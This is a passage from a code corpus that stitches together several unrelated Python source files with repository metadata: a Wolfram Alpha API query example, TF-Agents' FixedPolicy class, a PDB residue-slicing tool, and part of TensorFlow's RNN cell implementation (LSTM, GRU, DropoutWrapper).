7cc611b470226a7983f85b4788df5884fa5140ed
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import wap
server = 'http://api.wolframalpha.com/v2/query.jsp'
appid = 'XXXX'
input = 'pi'
waeo = wap.WolframAlphaEngine(appid, server)
queryStr = waeo.CreateQuery(input)
wap.WolframAlphaQuery(queryStr, appid)
result = waeo.PerformQuery(queryStr)
result = wap.WolframAlphaQueryResult(result)
for pod in result.Pods():
waPod = wap.Pod(pod)
title = "Pod.title: " + waPod.Title()[0]
print title
for subpod in waPod.Subpods():
waSubpod = wap.Subpod(subpod)
plaintext = waSubpod.Plaintext()[0]
img = waSubpod.Img()
src = wap.scanbranches(img[0], 'src')[0]
alt = wap.scanbranches(img[0], 'alt')[0]
print "-------------"
print "img.src: " + src
print "img.alt: " + alt
print "\n"
| 25.62069
| 51
| 0.66891
|
5a354848db3ce6db64424fb17d8f5bf471d55494
| 4,802
|
py
|
Python
|
tf_agents/policies/fixed_policy.py
|
Francis777/agents
|
24e878a697be418307cfbff69724d86be767719d
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/policies/fixed_policy.py
|
Francis777/agents
|
24e878a697be418307cfbff69724d86be767719d
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/policies/fixed_policy.py
|
Francis777/agents
|
24e878a697be418307cfbff69724d86be767719d
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A policy which always returns a fixed action.
Mainly used for unit tests.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Optional, Text
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
import tensorflow_probability as tfp
from tf_agents.policies import tf_policy
from tf_agents.trajectories import policy_step
from tf_agents.trajectories import time_step as ts
from tf_agents.typing import types
from tf_agents.utils import common
from tf_agents.utils import nest_utils
class FixedPolicy(tf_policy.TFPolicy):
"""A policy which always returns a fixed action."""
def __init__(self,
actions: types.NestedTensor,
time_step_spec: ts.TimeStep,
action_spec: types.NestedTensorSpec,
emit_log_probability: bool = True,
policy_info: types.NestedTensorSpec = (),
info_spec: types.NestedTensorSpec = (),
name: Optional[Text] = None):
"""A policy which always returns a fixed action.
Args:
actions: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `action_spec()`.
time_step_spec: A `TimeStep` spec of the expected time_steps.
action_spec: A nest of BoundedTensorSpec representing the actions.
emit_log_probability: Emit log-probabilities of actions, if supported. If
True, policy_step.info will have CommonFields.LOG_PROBABILITY set.
Please consult utility methods provided in policy_step for setting and
retrieving these. When working with custom policies, either provide a
dictionary info_spec or a namedtuple with the field 'log_probability'.
policy_info: A policy info to be returned in PolicyStep.
info_spec: A policy info spec.
name: The name of this policy. All variables in this module will fall
under that name. Defaults to the class name.
"""
super(FixedPolicy, self).__init__(time_step_spec, action_spec, clip=False,
info_spec=info_spec,
name=name,
emit_log_probability=emit_log_probability)
nest_utils.assert_same_structure(self._action_spec, actions)
def convert(action, spec):
return tf.convert_to_tensor(value=action, dtype=spec.dtype)
self._action_value = tf.nest.map_structure(convert, actions,
self._action_spec)
if self._emit_log_probability:
log_probability = tf.nest.map_structure(
lambda t: tf.constant(0.0, tf.float32), self._action_spec)
self._policy_info = policy_step.set_log_probability(policy_info,
log_probability) # pytype: disable=wrong-arg-types
else:
self._policy_info = policy_info
def _variables(self):
return []
def _get_policy_info_and_action(self, time_step):
outer_shape = nest_utils.get_outer_shape(time_step, self._time_step_spec)
if self._emit_log_probability:
log_probability = tf.nest.map_structure(
lambda _: tf.zeros(outer_shape, tf.float32), self._action_spec)
policy_info = policy_step.set_log_probability(
self._policy_info, log_probability=log_probability)
else:
policy_info = self._policy_info
action = tf.nest.map_structure(lambda t: common.replicate(t, outer_shape),
self._action_value)
return policy_info, action
def _action(self, time_step, policy_state, seed):
del seed
policy_info, action = self._get_policy_info_and_action(time_step)
return policy_step.PolicyStep(action, policy_state, policy_info)
def _distribution(self, time_step, policy_state):
policy_info, action = self._get_policy_info_and_action(time_step)
def dist_fn(action):
"""Return a categorical distribution with all density on fixed action."""
return tfp.distributions.Deterministic(loc=action)
return policy_step.PolicyStep(
tf.nest.map_structure(dist_fn, action), policy_state, policy_info)
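# Hedged usage sketch (not part of the original file; the spec shapes and the
# fixed action value below are illustrative assumptions):
#
#   from tf_agents.specs import tensor_spec
#
#   action_spec = tensor_spec.BoundedTensorSpec([], tf.int32, minimum=0, maximum=3)
#   time_step_spec = ts.time_step_spec(tensor_spec.TensorSpec([2], tf.float32))
#   policy = FixedPolicy(tf.constant(2), time_step_spec, action_spec)
#   action_step = policy.action(ts.restart(tf.zeros([1, 2]), batch_size=1))
#   # action_step.action is always 2, and log-probability info is emitted.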
| 42.122807
| 109
| 0.702832
|
bdab127d3bdba5e9517e41922671458fb53d8ee0
| 4,224
|
py
|
Python
|
pdb_rslice.py
|
edraizen/pdb-tools
|
b43ef472cb9c53ef58e400888a2ed837512ae7ee
|
[
"Apache-2.0"
] | null | null | null |
pdb_rslice.py
|
edraizen/pdb-tools
|
b43ef472cb9c53ef58e400888a2ed837512ae7ee
|
[
"Apache-2.0"
] | null | null | null |
pdb_rslice.py
|
edraizen/pdb-tools
|
b43ef472cb9c53ef58e400888a2ed837512ae7ee
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
Extracts a portion of the PDB file, from residue i (to residue j).
Slices are inclusive.
usage: python pdb_rslice.py <i>:<j> <pdb file>
examples: python pdb_rslice.py 1:10 1CTF.pdb # Extracts residues 1 to 10
python pdb_rslice.py 1: 1CTF.pdb # Extracts residues 1 to END
python pdb_rslice.py :5 1CTF.pdb # Extracts residues from START to 5.
python pdb_rslice.py :5 10: 1CTF.pdb # Extracts residues from START to 5 10 to END
Author: {0} ({1})
This program is part of the PDB tools distributed with HADDOCK
or with the HADDOCK tutorial. The utilities in this package
can be used to quickly manipulate PDB files, with the benefit
of 'piping' several different commands. This is a rewrite of old
FORTRAN77 code that was taking too much effort to compile. RIP.
"""
import os
import re
import sys
from collections import defaultdict
__author__ = "Joao Rodrigues"
__email__ = "j.p.g.l.m.rodrigues@gmail.com"
USAGE = __doc__.format(__author__, __email__)
#SEQUENTIAL = False
def check_input(args):
"""
Checks whether to read from stdin/file and validates user input/options.
"""
if not len(args):
sys.stderr.write(USAGE)
sys.exit(1)
elif len(args) >= 1:
if not sys.stdin.isatty() and not os.path.isfile(args[-1]):
# Options & Pipe
pdbfh = sys.stdin
end = len(args)
elif os.path.isfile(args[-1]):
# Options & File
pdbfh = open(args[-1], 'r')
end = -1
else:
sys.stderr.write('File not found: ' + args[-1] + '\n')
sys.stderr.write(USAGE)
sys.exit(1)
rslice = args[:end]
else:
sys.stderr.write(USAGE)
sys.exit(1)
# Parse st and end of slices
_rslices = []
for _rslice in rslice:
match = re.match('([\-0-9A-Z]*):([\-0-9A-Z]*)', _rslice)
if match:
st_slice, en_slice = match.groups()
if st_slice == "":
st_slice = True
if en_slice == "":
en_slice = True
else:
match = re.match('([\-0-9A-Z]*)', _rslice)
if match:
st_slice = match.group()
en_slice = None
else:
sys.stderr.write('Invalid slice: ' + _rslice + '\n')
sys.stderr.write(USAGE)
sys.exit(1)
_rslices.append((st_slice, en_slice))
return (_rslices, pdbfh)
def _slice_pdb(fhandle, rslice):
"""Enclosing logic in a function to speed up a bit"""
# if False: #and not SEQUENTIAL:
# for line in fhandle:
# if line.startswith(('ATOM', 'HETATM', 'TER')):
# if any((st <= int(line[22:26]) <= en for st, en in rslice)):
# yield line
# else:
# yield line
# else:
#set rslice status, True=open/reading residues until end is found
status = [False]*len(rslice)
    # Mark slices with an open start (the ":<end>" form) as active from the
    # first line.
    for i, (st, en) in enumerate(rslice):
        if isinstance(st, bool) and st:
            status[i] = True  # was "status[i] == True", a no-op comparison
for line in fhandle:
if line.startswith(('ATOM', 'HETATM', 'TER')):
res = line[22:27].strip()
for i, (st, en) in enumerate(rslice):
if res == st:
status[i] = True
break
elif res == en:
status[i] = False
break
elif en is None:
status[i] = False
for i in range(len(rslice)):
if status[i]:
yield line
break
if __name__ == '__main__':
# Check Input
rslice, pdbfh = check_input(sys.argv[1:])
# Do the job
new_pdb = _slice_pdb(pdbfh, rslice)
try:
sys.stdout.write(''.join(new_pdb))
#sys.stdout.flush()
pass
except IOError:
# This is here to catch Broken Pipes
# for example to use 'head' or 'tail' without
# the error message showing up
pass
# last line of the script
# We can close it even if it is sys.stdin
pdbfh.close()
sys.exit(0)
| 29.333333
| 93
| 0.547112
|
500e3b78597c6bda22c23770a2a96b1bd30f4a4e
| 39,893
|
py
|
Python
|
tensorflow/python/ops/rnn_cell_impl.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 13
|
2017-02-22T02:20:06.000Z
|
2018-06-06T04:18:03.000Z
|
tensorflow/python/ops/rnn_cell_impl.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 10
|
2017-07-13T00:24:03.000Z
|
2017-07-17T07:39:03.000Z
|
tensorflow/python/ops/rnn_cell_impl.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 7
|
2017-08-01T04:02:07.000Z
|
2018-10-06T21:07:20.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module implementing RNN Cells.
This module provides a number of basic commonly used RNN cells, such as LSTM
(Long Short Term Memory) or GRU (Gated Recurrent Unit), and a number of
operators that allow adding dropouts, projections, or embeddings for inputs.
Constructing multi-layer cells is supported by the class `MultiRNNCell`, or by
calling the `rnn` ops several times.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import hashlib
import numbers
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.layers import base as base_layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
_BIAS_VARIABLE_NAME = "bias"
_WEIGHTS_VARIABLE_NAME = "kernel"
def _like_rnncell(cell):
"""Checks that a given object is an RNNCell by using duck typing."""
conditions = [hasattr(cell, "output_size"), hasattr(cell, "state_size"),
hasattr(cell, "zero_state"), callable(cell)]
return all(conditions)
def _concat(prefix, suffix, static=False):
"""Concat that enables int, Tensor, or TensorShape values.
This function takes a size specification, which can be an integer, a
TensorShape, or a Tensor, and converts it into a concatenated Tensor
(if static = False) or a list of integers (if static = True).
Args:
prefix: The prefix; usually the batch size (and/or time step size).
(TensorShape, int, or Tensor.)
suffix: TensorShape, int, or Tensor.
static: If `True`, return a python list with possibly unknown dimensions.
Otherwise return a `Tensor`.
Returns:
shape: the concatenation of prefix and suffix.
Raises:
ValueError: if `suffix` is not a scalar or vector (or TensorShape).
ValueError: if prefix or suffix was `None` and asked for dynamic
Tensors out.
"""
if isinstance(prefix, ops.Tensor):
p = prefix
p_static = tensor_util.constant_value(prefix)
if p.shape.ndims == 0:
p = array_ops.expand_dims(p, 0)
elif p.shape.ndims != 1:
raise ValueError("prefix tensor must be either a scalar or vector, "
"but saw tensor: %s" % p)
else:
p = tensor_shape.as_shape(prefix)
p_static = p.as_list() if p.ndims is not None else None
p = (constant_op.constant(p.as_list(), dtype=dtypes.int32)
if p.is_fully_defined() else None)
if isinstance(suffix, ops.Tensor):
s = suffix
s_static = tensor_util.constant_value(suffix)
if s.shape.ndims == 0:
s = array_ops.expand_dims(s, 0)
elif s.shape.ndims != 1:
raise ValueError("suffix tensor must be either a scalar or vector, "
"but saw tensor: %s" % s)
else:
s = tensor_shape.as_shape(suffix)
s_static = s.as_list() if s.ndims is not None else None
s = (constant_op.constant(s.as_list(), dtype=dtypes.int32)
if s.is_fully_defined() else None)
if static:
shape = tensor_shape.as_shape(p_static).concatenate(s_static)
shape = shape.as_list() if shape.ndims is not None else None
else:
if p is None or s is None:
raise ValueError("Provided a prefix or suffix of None: %s and %s"
% (prefix, suffix))
shape = array_ops.concat((p, s), 0)
return shape
def _zero_state_tensors(state_size, batch_size, dtype):
"""Create tensors of zeros based on state_size, batch_size, and dtype."""
def get_state_shape(s):
"""Combine s with batch_size to get a proper tensor shape."""
c = _concat(batch_size, s)
c_static = _concat(batch_size, s, static=True)
size = array_ops.zeros(c, dtype=dtype)
size.set_shape(c_static)
return size
return nest.map_structure(get_state_shape, state_size)
class RNNCell(base_layer.Layer):
"""Abstract object representing an RNN cell.
Every `RNNCell` must have the properties below and implement `call` with
the signature `(output, next_state) = call(input, state)`. The optional
third input argument, `scope`, is allowed for backwards compatibility
purposes; but should be left off for new subclasses.
This definition of cell differs from the definition used in the literature.
In the literature, 'cell' refers to an object with a single scalar output.
This definition refers to a horizontal array of such units.
An RNN cell, in the most abstract setting, is anything that has
a state and performs some operation that takes a matrix of inputs.
This operation results in an output matrix with `self.output_size` columns.
If `self.state_size` is an integer, this operation also results in a new
state matrix with `self.state_size` columns. If `self.state_size` is a
(possibly nested tuple of) TensorShape object(s), then it should return a
matching structure of Tensors having shape `[batch_size].concatenate(s)`
  for each `s` in `self.state_size`.
"""
def __call__(self, inputs, state, scope=None):
"""Run this RNN cell on inputs, starting from the given state.
Args:
inputs: `2-D` tensor with shape `[batch_size x input_size]`.
state: if `self.state_size` is an integer, this should be a `2-D Tensor`
with shape `[batch_size x self.state_size]`. Otherwise, if
`self.state_size` is a tuple of integers, this should be a tuple
with shapes `[batch_size x s] for s in self.state_size`.
scope: VariableScope for the created subgraph; defaults to class name.
Returns:
A pair containing:
- Output: A `2-D` tensor with shape `[batch_size x self.output_size]`.
- New state: Either a single `2-D` tensor, or a tuple of tensors matching
the arity and shapes of `state`.
"""
if scope is not None:
with vs.variable_scope(scope,
custom_getter=self._rnn_get_variable) as scope:
return super(RNNCell, self).__call__(inputs, state, scope=scope)
else:
with vs.variable_scope(vs.get_variable_scope(),
custom_getter=self._rnn_get_variable):
return super(RNNCell, self).__call__(inputs, state)
def _rnn_get_variable(self, getter, *args, **kwargs):
variable = getter(*args, **kwargs)
trainable = (variable in tf_variables.trainable_variables() or
(isinstance(variable, tf_variables.PartitionedVariable) and
list(variable)[0] in tf_variables.trainable_variables()))
if trainable and variable not in self._trainable_weights:
self._trainable_weights.append(variable)
elif not trainable and variable not in self._non_trainable_weights:
self._non_trainable_weights.append(variable)
return variable
@property
def state_size(self):
"""size(s) of state(s) used by this cell.
It can be represented by an Integer, a TensorShape or a tuple of Integers
or TensorShapes.
"""
raise NotImplementedError("Abstract method")
@property
def output_size(self):
"""Integer or TensorShape: size of outputs produced by this cell."""
raise NotImplementedError("Abstract method")
def build(self, _):
# This tells the parent Layer object that it's OK to call
# self.add_variable() inside the call() method.
pass
def zero_state(self, batch_size, dtype):
"""Return zero-filled state tensor(s).
Args:
batch_size: int, float, or unit Tensor representing the batch size.
dtype: the data type to use for the state.
Returns:
If `state_size` is an int or TensorShape, then the return value is a
`N-D` tensor of shape `[batch_size x state_size]` filled with zeros.
If `state_size` is a nested list or tuple, then the return value is
a nested list or tuple (of the same structure) of `2-D` tensors with
the shapes `[batch_size x s]` for each s in `state_size`.
"""
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
state_size = self.state_size
return _zero_state_tensors(state_size, batch_size, dtype)
class BasicRNNCell(RNNCell):
"""The most basic RNN cell.
Args:
num_units: int, The number of units in the LSTM cell.
activation: Nonlinearity to use. Default: `tanh`.
reuse: (optional) Python boolean describing whether to reuse variables
in an existing scope. If not `True`, and the existing scope already has
the given variables, an error is raised.
"""
def __init__(self, num_units, activation=None, reuse=None):
super(BasicRNNCell, self).__init__(_reuse=reuse)
self._num_units = num_units
self._activation = activation or math_ops.tanh
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
"""Most basic RNN: output = new_state = act(W * input + U * state + B)."""
output = self._activation(_linear([inputs, state], self._num_units, True))
return output, output
class GRUCell(RNNCell):
"""Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078)."""
def __init__(self,
num_units,
activation=None,
reuse=None,
kernel_initializer=None,
bias_initializer=None):
super(GRUCell, self).__init__(_reuse=reuse)
self._num_units = num_units
self._activation = activation or math_ops.tanh
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
"""Gated recurrent unit (GRU) with nunits cells."""
with vs.variable_scope("gates"): # Reset gate and update gate.
# We start with bias of 1.0 to not reset and not update.
bias_ones = self._bias_initializer
if self._bias_initializer is None:
dtype = [a.dtype for a in [inputs, state]][0]
bias_ones = init_ops.constant_initializer(1.0, dtype=dtype)
value = math_ops.sigmoid(
_linear([inputs, state], 2 * self._num_units, True, bias_ones,
self._kernel_initializer))
r, u = array_ops.split(value=value, num_or_size_splits=2, axis=1)
with vs.variable_scope("candidate"):
c = self._activation(
_linear([inputs, r * state], self._num_units, True,
self._bias_initializer, self._kernel_initializer))
new_h = u * state + (1 - u) * c
return new_h, new_h
_LSTMStateTuple = collections.namedtuple("LSTMStateTuple", ("c", "h"))
class LSTMStateTuple(_LSTMStateTuple):
"""Tuple used by LSTM Cells for `state_size`, `zero_state`, and output state.
Stores two elements: `(c, h)`, in that order.
Only used when `state_is_tuple=True`.
"""
__slots__ = ()
@property
def dtype(self):
(c, h) = self
if c.dtype != h.dtype:
raise TypeError("Inconsistent internal state: %s vs %s" %
(str(c.dtype), str(h.dtype)))
return c.dtype
class BasicLSTMCell(RNNCell):
"""Basic LSTM recurrent network cell.
The implementation is based on: http://arxiv.org/abs/1409.2329.
We add forget_bias (default: 1) to the biases of the forget gate in order to
reduce the scale of forgetting in the beginning of the training.
It does not allow cell clipping, a projection layer, and does not
use peep-hole connections: it is the basic baseline.
For advanced models, please use the full @{tf.nn.rnn_cell.LSTMCell}
that follows.
"""
def __init__(self, num_units, forget_bias=1.0,
state_is_tuple=True, activation=None, reuse=None):
"""Initialize the basic LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (see above).
state_is_tuple: If True, accepted and returned states are 2-tuples of
the `c_state` and `m_state`. If False, they are concatenated
along the column axis. The latter behavior will soon be deprecated.
activation: Activation function of the inner states. Default: `tanh`.
reuse: (optional) Python boolean describing whether to reuse variables
in an existing scope. If not `True`, and the existing scope already has
the given variables, an error is raised.
"""
super(BasicLSTMCell, self).__init__(_reuse=reuse)
if not state_is_tuple:
logging.warn("%s: Using a concatenated state is slower and will soon be "
"deprecated. Use state_is_tuple=True.", self)
self._num_units = num_units
self._forget_bias = forget_bias
self._state_is_tuple = state_is_tuple
self._activation = activation or math_ops.tanh
@property
def state_size(self):
return (LSTMStateTuple(self._num_units, self._num_units)
if self._state_is_tuple else 2 * self._num_units)
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
"""Long short-term memory cell (LSTM)."""
sigmoid = math_ops.sigmoid
# Parameters of gates are concatenated into one multiply for efficiency.
if self._state_is_tuple:
c, h = state
else:
c, h = array_ops.split(value=state, num_or_size_splits=2, axis=1)
concat = _linear([inputs, h], 4 * self._num_units, True)
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i, j, f, o = array_ops.split(value=concat, num_or_size_splits=4, axis=1)
new_c = (
c * sigmoid(f + self._forget_bias) + sigmoid(i) * self._activation(j))
new_h = self._activation(new_c) * sigmoid(o)
if self._state_is_tuple:
new_state = LSTMStateTuple(new_c, new_h)
else:
new_state = array_ops.concat([new_c, new_h], 1)
return new_h, new_state
class LSTMCell(RNNCell):
"""Long short-term memory unit (LSTM) recurrent network cell.
The default non-peephole implementation is based on:
http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf
S. Hochreiter and J. Schmidhuber.
"Long Short-Term Memory". Neural Computation, 9(8):1735-1780, 1997.
The peephole implementation is based on:
https://research.google.com/pubs/archive/43905.pdf
Hasim Sak, Andrew Senior, and Francoise Beaufays.
"Long short-term memory recurrent neural network architectures for
large scale acoustic modeling." INTERSPEECH, 2014.
The class uses optional peep-hole connections, optional cell clipping, and
an optional projection layer.
"""
def __init__(self, num_units,
use_peepholes=False, cell_clip=None,
initializer=None, num_proj=None, proj_clip=None,
num_unit_shards=None, num_proj_shards=None,
forget_bias=1.0, state_is_tuple=True,
activation=None, reuse=None):
"""Initialize the parameters for an LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell
use_peepholes: bool, set True to enable diagonal/peephole connections.
cell_clip: (optional) A float value, if provided the cell state is clipped
by this value prior to the cell output activation.
initializer: (optional) The initializer to use for the weight and
projection matrices.
num_proj: (optional) int, The output dimensionality for the projection
matrices. If None, no projection is performed.
proj_clip: (optional) A float value. If `num_proj > 0` and `proj_clip` is
provided, then the projected values are clipped elementwise to within
`[-proj_clip, proj_clip]`.
num_unit_shards: Deprecated, will be removed by Jan. 2017.
Use a variable_scope partitioner instead.
num_proj_shards: Deprecated, will be removed by Jan. 2017.
Use a variable_scope partitioner instead.
forget_bias: Biases of the forget gate are initialized by default to 1
in order to reduce the scale of forgetting at the beginning of
the training.
state_is_tuple: If True, accepted and returned states are 2-tuples of
the `c_state` and `m_state`. If False, they are concatenated
along the column axis. This latter behavior will soon be deprecated.
activation: Activation function of the inner states. Default: `tanh`.
reuse: (optional) Python boolean describing whether to reuse variables
in an existing scope. If not `True`, and the existing scope already has
the given variables, an error is raised.
"""
super(LSTMCell, self).__init__(_reuse=reuse)
if not state_is_tuple:
logging.warn("%s: Using a concatenated state is slower and will soon be "
"deprecated. Use state_is_tuple=True.", self)
if num_unit_shards is not None or num_proj_shards is not None:
logging.warn(
"%s: The num_unit_shards and proj_unit_shards parameters are "
"deprecated and will be removed in Jan 2017. "
"Use a variable scope with a partitioner instead.", self)
self._num_units = num_units
self._use_peepholes = use_peepholes
self._cell_clip = cell_clip
self._initializer = initializer
self._num_proj = num_proj
self._proj_clip = proj_clip
self._num_unit_shards = num_unit_shards
self._num_proj_shards = num_proj_shards
self._forget_bias = forget_bias
self._state_is_tuple = state_is_tuple
self._activation = activation or math_ops.tanh
if num_proj:
self._state_size = (
LSTMStateTuple(num_units, num_proj)
if state_is_tuple else num_units + num_proj)
self._output_size = num_proj
else:
self._state_size = (
LSTMStateTuple(num_units, num_units)
if state_is_tuple else 2 * num_units)
self._output_size = num_units
@property
def state_size(self):
return self._state_size
@property
def output_size(self):
return self._output_size
def call(self, inputs, state):
"""Run one step of LSTM.
Args:
inputs: input Tensor, 2D, batch x num_units.
state: if `state_is_tuple` is False, this must be a state Tensor,
`2-D, batch x state_size`. If `state_is_tuple` is True, this must be a
tuple of state Tensors, both `2-D`, with column sizes `c_state` and
`m_state`.
Returns:
A tuple containing:
- A `2-D, [batch x output_dim]`, Tensor representing the output of the
LSTM after reading `inputs` when previous state was `state`.
Here output_dim is:
num_proj if num_proj was set,
num_units otherwise.
- Tensor(s) representing the new state of LSTM after reading `inputs` when
the previous state was `state`. Same type and shape(s) as `state`.
Raises:
ValueError: If input size cannot be inferred from inputs via
static shape inference.
"""
num_proj = self._num_units if self._num_proj is None else self._num_proj
sigmoid = math_ops.sigmoid
if self._state_is_tuple:
(c_prev, m_prev) = state
else:
c_prev = array_ops.slice(state, [0, 0], [-1, self._num_units])
m_prev = array_ops.slice(state, [0, self._num_units], [-1, num_proj])
dtype = inputs.dtype
input_size = inputs.get_shape().with_rank(2)[1]
if input_size.value is None:
raise ValueError("Could not infer input size from inputs.get_shape()[-1]")
scope = vs.get_variable_scope()
with vs.variable_scope(scope, initializer=self._initializer) as unit_scope:
if self._num_unit_shards is not None:
unit_scope.set_partitioner(
partitioned_variables.fixed_size_partitioner(
self._num_unit_shards))
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
lstm_matrix = _linear([inputs, m_prev], 4 * self._num_units, bias=True)
i, j, f, o = array_ops.split(
value=lstm_matrix, num_or_size_splits=4, axis=1)
# Diagonal connections
if self._use_peepholes:
with vs.variable_scope(unit_scope) as projection_scope:
if self._num_unit_shards is not None:
projection_scope.set_partitioner(None)
w_f_diag = vs.get_variable(
"w_f_diag", shape=[self._num_units], dtype=dtype)
w_i_diag = vs.get_variable(
"w_i_diag", shape=[self._num_units], dtype=dtype)
w_o_diag = vs.get_variable(
"w_o_diag", shape=[self._num_units], dtype=dtype)
if self._use_peepholes:
c = (sigmoid(f + self._forget_bias + w_f_diag * c_prev) * c_prev +
sigmoid(i + w_i_diag * c_prev) * self._activation(j))
else:
c = (sigmoid(f + self._forget_bias) * c_prev + sigmoid(i) *
self._activation(j))
if self._cell_clip is not None:
# pylint: disable=invalid-unary-operand-type
c = clip_ops.clip_by_value(c, -self._cell_clip, self._cell_clip)
# pylint: enable=invalid-unary-operand-type
if self._use_peepholes:
m = sigmoid(o + w_o_diag * c) * self._activation(c)
else:
m = sigmoid(o) * self._activation(c)
if self._num_proj is not None:
with vs.variable_scope("projection") as proj_scope:
if self._num_proj_shards is not None:
proj_scope.set_partitioner(
partitioned_variables.fixed_size_partitioner(
self._num_proj_shards))
m = _linear(m, self._num_proj, bias=False)
if self._proj_clip is not None:
# pylint: disable=invalid-unary-operand-type
m = clip_ops.clip_by_value(m, -self._proj_clip, self._proj_clip)
# pylint: enable=invalid-unary-operand-type
new_state = (LSTMStateTuple(c, m) if self._state_is_tuple else
array_ops.concat([c, m], 1))
return m, new_state
def _enumerated_map_structure(map_fn, *args, **kwargs):
ix = [0]
def enumerated_fn(*inner_args, **inner_kwargs):
r = map_fn(ix[0], *inner_args, **inner_kwargs)
ix[0] += 1
return r
return nest.map_structure(enumerated_fn, *args, **kwargs)
class DropoutWrapper(RNNCell):
"""Operator adding dropout to inputs and outputs of the given cell."""
def __init__(self, cell, input_keep_prob=1.0, output_keep_prob=1.0,
state_keep_prob=1.0, variational_recurrent=False,
input_size=None, dtype=None, seed=None):
"""Create a cell with added input, state, and/or output dropout.
If `variational_recurrent` is set to `True` (**NOT** the default behavior),
    then the same dropout mask is applied at every step, as described in:
Y. Gal, Z Ghahramani. "A Theoretically Grounded Application of Dropout in
Recurrent Neural Networks". https://arxiv.org/abs/1512.05287
Otherwise a different dropout mask is applied at every time step.
Args:
cell: an RNNCell, a projection to output_size is added to it.
input_keep_prob: unit Tensor or float between 0 and 1, input keep
probability; if it is constant and 1, no input dropout will be added.
output_keep_prob: unit Tensor or float between 0 and 1, output keep
probability; if it is constant and 1, no output dropout will be added.
      state_keep_prob: unit Tensor or float between 0 and 1, state keep
        probability; if it is constant and 1, no state dropout will be added.
State dropout is performed on the *output* states of the cell.
variational_recurrent: Python bool. If `True`, then the same
dropout pattern is applied across all time steps per run call.
If this parameter is set, `input_size` **must** be provided.
input_size: (optional) (possibly nested tuple of) `TensorShape` objects
containing the depth(s) of the input tensors expected to be passed in to
the `DropoutWrapper`. Required and used **iff**
`variational_recurrent = True` and `input_keep_prob < 1`.
dtype: (optional) The `dtype` of the input, state, and output tensors.
Required and used **iff** `variational_recurrent = True`.
seed: (optional) integer, the randomness seed.
Raises:
TypeError: if cell is not an RNNCell.
ValueError: if any of the keep_probs are not between 0 and 1.
"""
if not _like_rnncell(cell):
raise TypeError("The parameter cell is not a RNNCell.")
with ops.name_scope("DropoutWrapperInit"):
def tensor_and_const_value(v):
tensor_value = ops.convert_to_tensor(v)
const_value = tensor_util.constant_value(tensor_value)
return (tensor_value, const_value)
for prob, attr in [(input_keep_prob, "input_keep_prob"),
(state_keep_prob, "state_keep_prob"),
(output_keep_prob, "output_keep_prob")]:
tensor_prob, const_prob = tensor_and_const_value(prob)
if const_prob is not None:
if const_prob < 0 or const_prob > 1:
raise ValueError("Parameter %s must be between 0 and 1: %d"
% (attr, const_prob))
setattr(self, "_%s" % attr, float(const_prob))
else:
setattr(self, "_%s" % attr, tensor_prob)
# Set cell, variational_recurrent, seed before running the code below
self._cell = cell
self._variational_recurrent = variational_recurrent
self._seed = seed
self._recurrent_input_noise = None
self._recurrent_state_noise = None
self._recurrent_output_noise = None
if variational_recurrent:
if dtype is None:
raise ValueError(
"When variational_recurrent=True, dtype must be provided")
def convert_to_batch_shape(s):
# Prepend a 1 for the batch dimension; for recurrent
# variational dropout we use the same dropout mask for all
# batch elements.
return array_ops.concat(
([1], tensor_shape.TensorShape(s).as_list()), 0)
def batch_noise(s, inner_seed):
shape = convert_to_batch_shape(s)
return random_ops.random_uniform(shape, seed=inner_seed, dtype=dtype)
